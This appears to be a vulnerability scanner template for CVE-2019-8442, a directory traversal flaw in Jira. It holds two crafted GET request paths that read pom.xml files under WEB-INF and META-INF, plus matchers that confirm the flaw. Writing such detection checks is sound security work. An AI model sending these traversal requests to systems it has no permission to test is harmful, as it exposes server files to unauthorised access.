id: CVE-2019-8442
info:
  name: JIRA Directory Traversal
  author: Kishore Krishna (siLLyDaddy)
  severity: high
  description: The CachingResourceDownloadRewriteRule class in Jira before version 7.13.4, and from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1 allows remote attackers to access files in the Jira webroot under the META-INF directory via a lax path access check.
  reference: https://jira.atlassian.com/browse/JRASERVER-69241
  tags: cve,cve2019,atlassian,jira,lfi
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.50
    cve-id: CVE-2019-8442

requests:
  - method: GET
    path:
      - "{{BaseURL}}/s/{{randstr}}/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml"
      - "{{BaseURL}}/s/{{randstr}}/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - '<groupId>com.atlassian.jira</groupId>'
        part: body